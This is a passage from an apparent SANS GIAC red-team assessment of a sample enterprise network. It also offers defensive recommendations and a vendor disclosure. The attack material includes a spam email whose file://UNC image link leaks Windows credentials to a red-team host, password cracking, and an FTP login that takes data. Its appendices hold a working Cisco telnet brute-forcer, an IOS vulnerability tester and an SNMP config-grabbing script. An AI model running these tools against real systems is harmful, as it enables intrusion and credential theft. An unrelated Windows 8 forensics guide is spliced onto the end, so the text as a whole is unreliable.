Outlook 97/2000, OutlookExpress 95/98, Netscape Navigator 4, Eudora 4, and possibly many others.The red team has gathered several pieces of information needed to determine if this attack can besuccessful• Clients behind the firewall are Windows 98 (D8).
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 34 of 49• Clients are using email software that will attempt to open file://UNC path references(D9).• Clients are using a Windows NT server as a domain controller for authenticationpurposes. (A4, D6, D8).• The firewall is not performing egress filtering on the NetBIOS ports (D8).• We have the email addresses for various people in the organization (A1, A3, A4, A5,D9).By carefully crafting an email message disguised to be ignored by the recipient as spam, we canforce an email client to try to load an image referenced in an HTML email message, accessingthe image over a file://UNC path.  Utilizing the L0pht Crack client on the destination Windowsserver to capture the NetBIOS authentication information, we will attempt to crack the password(Zatko).linux $ nc mail.giace.com 25220 mail.giace.com ESMTP Sendmail 8.9.3/8.9.3; Fri, 7 Sep 2001 16:15:03 -0400 (EDT)HELO250 OKMAIL FROM: redteam@redteam.com250 OK - mail from <redteam@redteam.com>RCPT TO: sleazysalesman@giace.com250 OK - Recipient <sleazysalesman@giace.com>DATA354 Send data.  End with CRLF.CRLFContent-Type: text/html<html><BODY background="file://\\winnt.redteam.com/sharename/backgr0und.jpg"bgColor=#ffffff NOSEND="1">Lose 300 pounds in 30 days with this diet...</html>.250 OKQUIT221 closing connectionlinux $After the mail has been delivered, the red team starts up L0pht Crack and waits for the recipientto open the email message.  Once opened, the email client will attempt to display the“backgr0und.jpg” file as a tiled background image.  Whether the file is retrieved successfully ornot is unimportant.  The recipient of the message will not see an error indicating the file did ordid not load successfully, and will be unaware that the request was sent without examining theHTML source of the message.In this case, we are targeting the individual we discovered as the Sales Director discovered instep B1.  Chances are this is not a technical individual, and will not be bothered to carefullyexamine the email message, opting only to delete it.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 35 of 49
Once received, the L0pht Crack tool can start cracking this password.  While Stuckless didindicate the use of the L0pht Crack tool as a method to ensure strong passwords are used withinthe GIAC Enterprises organization, this test is one of time-sensitivity.  In my testing, I was ableto get L0pht Crack 3.0 to reveal the password “STR0NG” on a Pentium II 233Mhz afterapproximately 3.5 hours with the custom dictionary I created in step D5:
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 36 of 49
LC3 does not give us the proper case of the password as it only had the LM hash to evaluate.We can simply try every permutation of upper and lower case for this password.  In this case, wecan cover all the case possibilities with 32 login attempts.Information RetrievalE1.   Attempt to logon to the public FTP server with discovered credentials.Tools Used: ftp clientCommands Typed: “ftp 3.3.3.4”Output Received: BelowThe red team targeted the Sales Director on a hunch that this user would have access to login tothe public FTP server, presumably to download presentations, pre-release software, and othersensitive materials.linux $ ftp ftp.giace.comConnected to ftp.giace.com.220 ftp Microsoft FTP Service (Version 5.0).Name (linux.redteam.com:redteam): mis/sleasysalesperson331 Password required for mis/sleazysalesperson.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 37 of 49Password: str0ng530 User mis/sleazysalesperson cannot log in.Login failed.ftp> user mis/sleazysalesperson331 Password required for mis/sleazysalesperson.Password: STR0NG530 User mis/sleazysalesperson cannot log in.Login failed.<multiple attempts pass>ftp> user mis/sleazysalesperson331 Password required for mis/sleasysalesperson.Password: sTr0nG230 User mis/sleasysalesperson logged in.ftp> get sensitivedata.doc200 PORT command successful.150 Opening ASCII mode data connection for sensitivedata.doc(5468672 bytes).226 Transfer complete.ftp: 5468672 bytes received in 51.08Seconds 107.07Kbytes/sec.ftp> bye221linux $Failed login attempts would be logged in the default configuration of the Microsoft FTP serverservice, but would likely not be noticed until the next time an audit is performed on the server.The red team could repeat step D10, targeting other individuals until a username/passwordcombination was discovered that permitted access to the FTP server.  For the purposes of thispaper, we have made this first attempt successful as detailed above.Security Policy ReviewWhen reviewing Parliament Hill Firewall Practicals to target for red team assessment, I choseStuckless’ paper because the flaws he overlooked are common to many enterprises.   WhileStuckless did a good job meeting the Visa “Ten Commandments”, I would recommend a fewadditional steps.1. Secure edge device resources.  Stuckless implemented a 3640 Cisco edge router toconnect from the GIAC Enterprises ISP, and did an excellent job blocking manyresources that are commonly probed and exploited by intruders.  However, he forgot thatwhen applying access lists to interfaces on a Cisco router, the access list does not getapplied to the router itself.  Therefore, the red team was able to probe and exploit theservices running on the Cisco router.Recommendation.  Implement the “Improving Securing On Cisco Routers” methodologyprovided by Cisco (Cisco1).  This document details the steps necessary to restrict accessto all resources on the edge router that may be abused by potential intruders.  Cisco alsoprovides a more lengthy document titled “Cisco ISP Essentials: Essential IOS FeaturesEvery ISP Should Consider” which also documents strong security practices for Cisco
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 38 of 49routers, albeit targeted to the ISP market (Cisco2).2. Implement operating system hardening practices.  In order to meet the Visa “TenCommandments” number 2 (Keep security patches up-to-date), Stuckless described ascenario where the his team holds weekly security meetings to discuss processes andprocedures with daily checks for new patches and security problems regarding thesystems they are using.  This is not enough however, as patches are behind the pace ofdiscovered vulnerabilities, and may not solve all security problems (such as thosediscussed in C7 and D10).Recommendation.  Many of these security concerns that are not resolved with up-do-datepatches can be resolved through security-conscious systems administration.  Byfollowing the guides made available at www.sansstore.org including “Windows NTSecurity: Step by Step” and “Solaris Security: Step by Step”, the risk of informationleakage and system penetration is reduced.3. Implement principle of least privilege (POLP) on egress Internet traffic.  As I mentionedin the introduction, Stuckless did an excellent job implementing the principle of leastprivilege on inbound traffic by only permitting those ports destined to the publicresources he specified.  However, he overlooked port filtering on the PIX firewall foregress traffic.  This flaw ultimately permitted the red team to coax a client to pass itslogon authentication information over the Internet.Recommendation.  Implement an access list on the PIX firewall that permits only trafficas documented in the organization’s security policy on an egress interface.  This does noteliminate the risk of reverse-shell style attacks, but would have made the attack describedin D10 fail.ConclusionThe red team scenario described is a practical one and, unfortunately, I suspect many sites arevulnerable to the attacks described herein.  It is important to note that the firewall was notenough to protect the enterprise from these attacks.  In general, firewalls should be just onebuilding block when securing an enterprise.  Also, the security of hosts is a critical component tothe overall security infrastructure.  It is a mistake to rely on a firewall to block vulnerabilities onyour systems solely through port filtering.Finally, when performing audits and security assessments of the organization, it is important tothink “out of the box”, and to check not only those resources you have worked so hard to secure,but also the resources you may have forgotten about.  Remember to stage audits not only fromthe outside, in, but also from the inside, out.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 39 of 49Works CitedCisco1.  “Improving Security on Cisco Routers.” URL:http://www.cisco.com/warp/public/707/21.html (18 Sep. 2001).Cisco2.  “Cisco ISP Essentials: Essential IOS Features Every ISP Should Consider.” Version 2.9.URL: http://www.cisco.com/public/cons/isp/documents/IOSEssentialsPDF.zip (18 Sep.2001).Gaius.  “Things to do in Cisco Land When You’re Dead.”  Phrack Magazine issue 56.1 May 2000. URL: http://www.phrack.org/show.php?p=56&a=10 (18 Sep. 2001).Hacker, Eric.  “Network File Resource Vulnerability.”  Windows 2000 Security Advice Listserv.10 Mar. 2001. URL:http://archives.neohapsis.com/archives/win2ksecadvice/2000-q1/0201.html (18 Sep.2001).Herzog, Pete.  “The Open Source Security Testing Methodology Manual.” Version 1.5.  1 Jul.2001. URL: http://uk.osstmm.org/osstmm.htm (18 Sep. 2001).Roy, Marek.  “Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0.”  BUGTRAQ Listserv.8 Aug. 2001.  URL: http://www.securityfocus.com/archive/1/202727 (18 Sep. 2001).Spitzner, Lance.  “Know Your Enemy: Passive Fingerprinting”.  The Honeynet Project.  3 Sept2001.  URL: http://project.honeynet.org/papers/finger/ (18 Sep. 2001).Stuckless, Colin.  “SANS GIAC Firewall and Perimeter Protection Practical Assignment.”24 Sep. 2000. URL: http://www.sans.org/y2k/practical/Colin_Stuckless.doc (18 Sep.2001).Visa International.  “Visa Merchant Resource Center: Fraud & Security (Visa TenCommandments)”.  URL:http://www.visabrc.com/doc.phtml?2,64,932,932a_cisp.html (18 Sep. 2001).Zatko, Peiter Mudge.  “LC3 Documentation.” Version 3.01. URL:http://www.atstake.com/research/lc3/documentation/help.htm (18 Sep. 2001).
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 40 of 49Appendix A#!/usr/bin/perl# sslcat.pl# Joshua Wrightuse strict;use Net::SSLeay qw(sslcat);my $server;my @results;my $reply;my $i;my $port = "443";my $CRLF = "\x0d\x0a";unless (@ARGV == 1) {    print "$0 - Send a simple GET request to a HTTPS server\n";    print "Usage: $0 host\n";    exit 1;}($server) = @ARGV;$reply = sslcat($server, $port, "GET / HTTP/1.1$CRLF$CRLF");@results = split($CRLF,$reply);while ($i < 6) {    print "$results[$i]\n";    $i++;}print "<snip>\n\n";exit(0);
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 41 of 49Appendix B#!/usr/bin/perl# referrer-addr.pl# Joshua Wrightuse strict;use Net::SSLeay qw(sslcat);my $server;my @results;my $reply;my $i;my $port = "443";my $CRLF = "\x0d\x0a";unless (@ARGV == 1) {    print "$0 – Discover internal IP of IIS Server with malformed\n";    print " GET request.\n";    print "Usage: $0 host\n";    exit 1;}($server) = @ARGV;$reply = sslcat($server, $port, "GET / HTTP/1.0$CRLF$CRLF");@results = split($CRLF,$reply);while ($i < 8) {    print "$results[$i]\n";    $i++;}print "<snip>\n\n";exit(0);
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 42 of 49Appendix C#!/bin/ksh## grabciscoconf v1.0 3/28/2001# Joshua Wright## This script utilizes the Net-SNMP package, formerly UCD-SNMP (available at# http://sourceforge.net/project/showfiles.php?group_id=12694) to do a few# things:## 1. Determine the remote hostname of the Cisco device# 2. Create an empty file in the /tftpboot directory, name = device hostname# 3. Copy the startup-config from the remote device via TFTP## Assumptions:# 1. Your TFTP server is the same device as the one you are running this#    script on# 2. You have SNMP-write access to the Cisco device you are working with# 3. You are working with Cisco IOS (routers or switches), CatOS is not#    working right now.## IMPORTANT: Identify the TFTP Server and your Write community string by# changing the variables TFTPSERVER and COMMUNITYSTRING## Use this program by specifying the IP address of the device you want to# contact for it's startup-config, e.x. "grabciscoconf 10.1.1.10"## If you want the configuration of several devices, you can run this program# in a loop, like this:## for each in 10.1.1.10 10.1.2.10 10.1.3.10 10.1.4.10 10.1.5.10 ; do#  grabciscoconf $each# done## TODO: Add parameter to copy running-confg, and to copy from TFTP to device# Test for "is TFTP server localhost?" and either touch files, or echo# message telling user to make sure the files exist.# Test to make sure we have community string write access# Test return parameters from each snmpset/get and exit with error if failedTFTPSERVER=10.1.1.1TIMEOUT=2SLEEPTIME=4COMMUNITYSTRING=privateif [ $# -ne 1 ] ; then echo "Usage: $0 ipaddress" exitfi# ping supplied IP and TFTP server to make sure they are up# Assume, of course, that ICMP is enabled and a lost ping indicates a system# that is not up.  If you are blocking ICMP somewhere along the way, comment# this out.echo Contacting TFTP Server ... \\c
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 43 of 49ping -n $TFTPSERVER $TIMEOUT >/dev/nullif [ $? -eq 1 ] ; then   echo "Error: Cannot contact TFTP Server at $TFTPSERVER, exiting"   exit 1fiecho Successful.echo Contacting remote device ... \\cping -n $1 $TIMEOUT >/dev/nullif [ $? -eq 1 ] ; then   echo "Error: Cannot contact device at $1, exiting"   exit 1fiecho Successful.# Use the system name as the filename# For some reason, the snmpget utility does not return an error code when the# key does not exist.  This makes it difficult for us to test for successful# contact to the SNMP MIB.echo Obtaining hostname of remote device ... \\cFILENAME=`snmpget -v 2c -Ov $1 $COMMUNITYSTRING .1.3.6.1.4.1.9.2.1.3.0`if [ $? -ne 0 ] ; then   echo "Error - exiting."   exit 1else   echo "$FILENAME".fi# strip the double-quotes off the returned string to use as a filenameFILENAME=`echo $FILENAME|sed 's/\"//g'`touch /tftpboot/$FILENAMEchmod 666 /tftpboot/$FILENAME# Delete the previously existing entrysnmpset -v 2c -c $COMMUNITYSTRING $1 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.333integer 6 >/dev/null# Get the fileecho Transferring file ... \\csnmpset -v 2c -c $COMMUNITYSTRING $1 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.333integer 1 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.333 integer 3.1.3.6.1.4.1.9.9.96.1.1.1.1.4.333 integer 1 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.333a "$TFTPSERVER" .1.3.6.1.4.1.9.9.96.1.1.1.1.6.333 string $FILENAME.1.3.6.1.4.1.9.9.96.1.1.1.1.14.333 integer 4 >/dev/nullif [ -f /tftpboot/$FILENAME ] ; then   echo Successful.else   sleep $SLEEPTIME   if [ -f /tftpboot/$FILENAME ] ; then      echo Successful   else      echo      echo File did not transfer.  Check permissions on /tftpboot, and that      echo TFTP Server is running.   fifi
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 44 of 49Appendix D#!/usr/bin/perl# 7/2/2001 Cisco IOS HTTP Vulnerability tester# Thanks to RFP for sendraw()# Joshua Wrightuse Socket;$ARGC=@ARGV;if ($ARGC <1) { print "Cisco IOS HTTP vulnerability tester\n\n"; print "Usage: $0 host\n";exit (1);}$host=$ARGV[0];$port=80;$target=inet_aton($host);$vulnerable=0;print "Connecting to device $host port $port ... ";@results=sendraw("GET /level/99/exec/ping HTTP/1.0\r\n\r\n");foreach $line (@results){ if ($line =~ /destination address/) {   $vulnerable=1;   } }if ($vulnerable) {  print "System is vulnerable.\n";  exit(0);} else {  print "System is not vulnerable.\n";  exit(1);}sub sendraw {        my ($pstr)=@_;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0)|| die("Socketproblems\n");        if(connect(S,pack "SnA4x8",2,$port,$target)){                my @in;                select(S);      $|=1;   print $pstr;                while(<S>){ push @in, $_;}                select(STDOUT); close(S); return @in;        } else { print "Cannot connect to $host port $port\n"; exit(3);}
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 45 of 49Appendix E#!/usr/bin/perl# cistelbf.pl# Joshua Wright## TODO:# Document program use# Maybe: alter program to brute-force login that only asks for password# Fix stats() to use singular time when appropriate## NOTES:# 8.14.2001 During testing, we would run as expected until# IO::Socket::INET: Connection refused message.  In my testing against# a Cisco 7206 VXR w/ NSE-1, the first 48 password attempts (16 sockets),# would work fine, and then refuse a connect.# I added a little delay after the 16th socket request so the router has# time to recover.  This is inefficient, but works for my demonstrative# purposes.use IO::Socket;my($m, $i, $remote_host, $remote_port, $dictionary, $username, $DEBUG);my($nosock, $nopass, $starttime, $endtime, $duration);my($NOSOCK_BEFORE_DELAY, $ROUTER_RECOVER, $VALID_USERNAME, $socket, $answer);$DEBUG=0;$CRLF = join chr(10), chr(13);$NOSOCK_BEFORE_DELAY=15;$ROUTER_RECOVER=2;$VALID_USERNAME=0;$nosock = 0;$nopass = 0;sub stats() {$endtime = time;$duration = ($endtime - $starttime);$hours = int($duration/3600);$minutes = int(($duration - ($hours * 3600))/60);$seconds = int($duration - (($hours * 3600) + ($minutes * 60)));print "Stats:\n";print "    Socket connections: $nosock\n";print "    Password guesses  : $nopass\n";print "    Duration          : $hours hours, $minutes minutes, $secondsseconds.\n";}# Start time$starttime = time;unless (@ARGV == 4) {    print "cistelbf.pl - Cisco brute force password check tool.\n\n";    print "Usage: $0 host port dict username\n";    exit 1;
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 46 of 49}($remote_host, $remote_port, $dictionary, $username) = @ARGV;# Flush STDOUT$| = 1;# Open the dictionary fileopen(DICTFILE, $dictionary) || die "Hey, cannot open dictionary file!";$m = 0;while (1) {    # Setup socket connection    if ($DEBUG) { print " Debug: Opening socket connection to$remote_host:$remote_port\n"; }    if ($m > $NOSOCK_BEFORE_DELAY) {        $m = 0;        sleep(2);    }    $socket = IO::Socket::INET->new(PeerAddr => $remote_host,                                    PeerPort => $remote_port,                                    Proto    => "tcp",                                    Type     => SOCK_STREAM,      Timeout  => 5,         Reuse    => 1)        or die "Couldn't connect to $remote_host:$remote_port : $@.  Bummer.\n";    if ($DEBUG) { print " Debug: Connected to $remote_host:$remote_port\n"; }    $nosock++;    $m++;    # $socket->autoflush(1);    # Should be garbage    $answer = <$socket>;    if ($DEBUG) { print " Debug: Should be garbage -> $answer\n"; }    print $socket "$CRLF";    $i = 0;    while ($i < 3) {        $answer = '';        $password = <DICTFILE>;        if ($password eq "") {            print "\nReached EOF on $dictionary\n";            stats();            exit(0);        }        while ($answer !~ /Username/) {            $answer = <$socket>;        }        if ($DEBUG) { print (" Debug: Got Username:, sending user and pass now.\n"); }        print $socket "$username";        print $socket "$CRLF";
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 47 of 49        print $socket "$password";        print $socket "$CRLF";        print STDOUT ".";        $nopass++;        # Take in all those strings        $answer = <$socket>;        $answer = <$socket>;        # Check to see if username is a valid one on the router        # only need to check once.        if (!$VALID_USERNAME) {            if ($answer =~ "invalid") {        print "\nIncorrect username supplied \"$username\".\n";                print "Router returned: $answer\n";                exit(2);            } else {                $VALID_USERNAME=1;            }        }        $answer = <$socket>;        if (($answer =~ /#/) || ($answer =~ />/)) {            print "\nLook what I found.. $answer\n";            print "Host: $remote_host:$remote_port\n";            print "Username: $username\n";            print "Password: $password\n";            stats();            exit(0);        } else {            if ($DEBUG) { print (" Debug: Failed user\/pass $username\/$password\n"); }        }        $i++;    }# terminate the connection when we're doneif ($DEBUG) { print (" Debug: Closing socket connection.\n"); }close($socket);}
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 48 of 49Appendix F-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1 To the PSIRT Team, I have been researching different Firewall and Perimeter Protectiondesigns, and working to improve the configuration of a design,written as part of a practical for my GIAC Certified Incident Handlercertification through a "red team" assessment. In my assessment, I discovered that many people are overlooking theiredge router when securing their perimeter, opting to rely on firewallconfiguration only.  During my research, I have discovered a fewdiscomforting factors about the Cisco IOS telnet and loggingimplementation that I think are flawed. IOS Flaw 1.  It is possible to identify usernames that are present onthe remote device by guessing usernames.  It is not necessary to havea valid password to determine if a username is present on the system. That is, when a Cisco device is configured to not use the defaultpassword only authentication method, instead opting to use aninternal list of valid systemusers, an attacker can telnet to the device and determine if theusername is valid on the system by watching for a "% Login Invalid"message or a "Password:" message.  While not a bug, this appears tobe flawed logic by reporting back to the attacker what usernames arevalid on the device. IOS Flaw 2.  The telnet service only permits three username/passwordattempts before disconnecting the socket connection, but does notinterject any delay between guesses. This flaw goes hand-in-hand with the next flaw in the telnetimplementation. IOS Flaw 3.  The telnet service does not interject a delay whencreating a socket connection before asking for authenticationinformation.  This permits the attacker to spawn connection attemptslimited only by the bandwidth of the connection. With the two flaws mentioned above, the job of an attacker whodesires to "brute-force" the password of a known username on thesystem is a much simpler task.  I have included a perl script I wroteto reinforce this concept at the bottom of this email.  The scripttakes the IP address of the destination device, port number, knownusername and a dictionary of words as parameters to try tosuccessfully login to the device. IOS Flaw 4.  There are no logging options present in Cisco IOS to
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 49 of 49indicate the presence of multiple failed username guesses, nor thelogging of multiple failed password guesses. While I did not test the logging options available to the networkadministrator through the use of RADIUS or Cisco Secure ACS, theredoes not appear to be an option that allows an administrator toreceive a logging message when multiple failed login attempts arereceived on the telnet service.  I have discovered that many edgerouters do not employ RADIUS or TACACS+ authentication as theresource is outside their firewall. IOS Flaw 5.  A logging message is created when an administratorleaves configuration mode, not when they enter configuration mode.Thus, it is possible to turn off all logging services withoutgenerating a message indicating that a user entered configurationmode. If an edge Cisco IOS device is compromised, the attacker can turn offall logging services by entering configuration mode and issuing a "nologging X.X.X.X" command.  It seems more sensible to log a"%SYS-5-CONFIG_I: Configured from console by vty0 (X.X.X.X)" whensomeone enters configuration mode.  In this fashion, the syslogserver would at least receive a message with an IP address to use fortracking before the attacker turned off all loggingservices. Certainly, the ultimate resolution for most of these flaws is toprotect the telnet service with an access-list, permitting only knownusers to have access to telnet to the device.  An even betterresolution would be to use SSH services in lieu of telnet services.I don't have an explanation for the configuration mode loggingmessage. I utilized a variety of different Cisco routers for testing purposesincluding a Cisco 2621, 3662 and 7206VXR running 12.0.3(T3),12.1.5(T7) and 12.1.8(a), respectively. Thanks for your attention. -----BEGIN PGP SIGNATURE-----Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBO6QLTI/i/ArUS0pzEQIaCACg67arpE6oMItawp1FZoQARbVZZhMAoJmCU1sTgjZdp33TmYCZeicuIcyH=Ev1l-----END PGP SIGNATURE----- Windows 8 Forensic Guide  
Amanda C. F.  Thomson, M.F.S. Candidate  
Advised by Eva Vincze, PhD 
The George Washington University, Washington, D.C. 
 
 
Consumer Preview  TM ® 
  
Windows 8 Forensic Guide  
 
 
Amanda  C. F. Thomson  
The George Washington University  
Washington, D.C.  
©2012  
 
 
Contents  
Windows 8 User Interface  ........................................................................ 3 
Windows Artifacts  ................................................................................. 15 
Local Folder  ............................................................................... 15 
Metro Apps  ................................................................................ 18 
IE10 Websites Visited  .................................................................  19 
Journal Notes  ............................................................................. 20 
Desktop Tools  ............................................................................ 22 
Metro App Web Cache  ............................................................... 23 
Metro App Cookies  .................................................................... 24 
Cache  ......................................................................................... 29 
Cookies  ...................................................................................... 30 
Microsoft Folder  ......................................................................... 31 
Digital Certific ates  ..................................................................... 31 
What’s New ................................................................................ 33 
User’s Contacts  .......................................................................... 40 
App Settings  .............................................................................. 43 
Windows Registry  .................................................................................. 45 
NTUSER.DAT  ............................................................................. 46 
SAM ........................................................................................... 49 
SYSTEM  ..................................................................................... 53 
USB STORAGE DEVICES  ........................................................... 58 
SOFTWARE  ................................................................................ 68 
Final Thoughts  ....................................................................................... 71 
Index  ...................................................................................................... 73 
 
 
WINDOWS 8 FORENSIC G UIDE  
1 
Thomson © 2012  About T his Guide  
With a new operating system, come new forensic challenges.  
Microsoft’s Windows 8 is connected to everything  – wherever 
you sign in, it’s connected.  E -mail is connected to Facebook is 
connected to contacts  is connected to Internet Explorer is co n-
nected to ... you get the point.  
indows 8 is  an operating system  “reimagined and reinvented from a 
solid core of Windows 7 speed and reliability”i.  While I can  neither co n-
firm nor deny this statement, there are certainly many forensically in-
teresting spots we are familiar with from Windows 7  and Vista , which is good for 
us because it means this operatin g system is not completely reinv ented.  With 
Windows 8, y ou will still find that Windows is Windows –  it keeps track of ever y-
thing.  App Data and its Local and Roaming folders  are still present .  The Registry 
has the same structure  we’ve been familiar with for quite some time.  And Wi n-
dows  still has the same standard programs.  Some things  in Windows 8 , however, 
are different.  
 
Gone are the days when we could just sit, or read a book, or, dare I suggest it?  -talk to the person next to us!  – while waiting f or an appointment or riding the 
train.   Everywhere we go, we see people staring intently into their tablet  or cell 
phone  reading the latest celebrity gossip, updating Facebook, calling in sick to 
work, and shopping online , all while texting and driving.  H opefully not, but you 
get the point.  And so does Microsoft.  Windows 8 is an operating system geared toward mobile devices, and that is definitely evident with the new interface.    
 When I registered for an indepe n-
dent research project in my pr o-
gram at T he George Washington 
University, I wanted to do som e-
thing that would contribute to the 
computer forensic community.  
So I  decided to take  on Windows 
8.  And by “ take  on”, I mean , it 
consumed my life for nearly four  
months .  No more Facebook.  No 
more Netfl ix.  It was just me and 
Windows 8  every night after work.   
Friday nights.   Weekends.   Than k-
fully, Windows 8 did not care that I W 

WINDOWS 8 FORENSIC G UIDE  
2 
Thomson © 2012  was turning  into a pasty bas ement -dwelling nerd  subsisting off of caffeine and 
over -processed food .   
 
While I am very well awa re of this and other operating systems’ existence, I som e-
how failed to realize, despite my forensic experience and everything I have learned  since I entered the industry , that I would be researching an entire opera t-
ing system .  Wait... what?  That doesn’ t ma ke sense? Let me explain -  I had this 
lofty goal of creating a user manual with charts and cheat sheets and compiling 
everything that could ever be possibly useful to a forensic examiner.  While I did 
create a user manual with charts and cheat sheets, this  is not a comprehensive 
guide.  In fact, I would not be surprised if I did not scratch the surface of Windows 8, because while much of it is forensically similar to Windows 7 , there is so much  
more  that is completely different.  
 For those wondering what my  research methodology was, here’s what I did:  
Originally I started this project with Windows 8 Developer  Preview , but when Con-
sumer Preview came out at the end of February, I started over.  I downloaded 
Windows 8 Consumer Preview 32 -bit Edition  from Micros oft and installed it in a vir-
tual machine using VMWare Workstation 8
ii.  I used it for nearly two weeks  and 
every couple of days  I made an image using FTK Imager v3.0.1iii.  I then used Gui d-
ance Software’s EnCase Forensic v6.17 for my examination and analysis  and a va-
riety of written resources (which have been given credit)iv. 
 So, I have done my best to find forensically interesting artifacts and information  in 
Windows 8.   When I did find something, I pointed it  out, attempted to figure out 
what was going on, and offer an explanation.  When I couldn’t figure it out, I stated so, because my hope is that this user guide will be a “living” document.  I want to keep it updated and as I discover new things in Windows 8, or revalidate what we already know from 7  and Vista , I will add to this.  If you  find something 
new or confirm an existing fact, please let me know  and you will be credited a c-
cordingly.  I have tried to keep the language of this guide easy to read, but if there is something that is unclear or I am wro ng, let me know that, too.  
 In this guide, you will find a section on Windows Artifacts, a section devoted to the Communications App , and the  last section on the  Windows Registry.  Boiling 
down this research project to just those three items  doesn’t sound like much, but I 
think I packed a lot of information into those three sections.   I learned a lot co n-
ducting this research and actually did have some  fun, but what I really hope  to get 
out of this is that you  found this guide useful  and it made your job as a forensic e x-
aminer a bit easier .  If you have any comments or suggestions, please shoot me an 
e-mail at propellerheadforensics@g mail .com .  For updates, visit my website at  
http://propellerheadforensics.com  or follow me on Twitter @propellerhead23 . 
WINDOWS 8 FORENSIC G UIDE  
3 
Thomson © 2012  Windows 8 User Interface  
 
Nearly everything that is new about this OS is geared toward 
touch screen devices ; you can sign -in by swiping your  finger on 
the screen in a pre -set pattern, you can read a document by 
“flipping” through the pages , and you can zoom in on an object 
by expanding the screen with two fingers .   
hile it is still possible to access the old interface, we can begin  to get 
ideas for fi guring out where data of forensic interest might reside by 
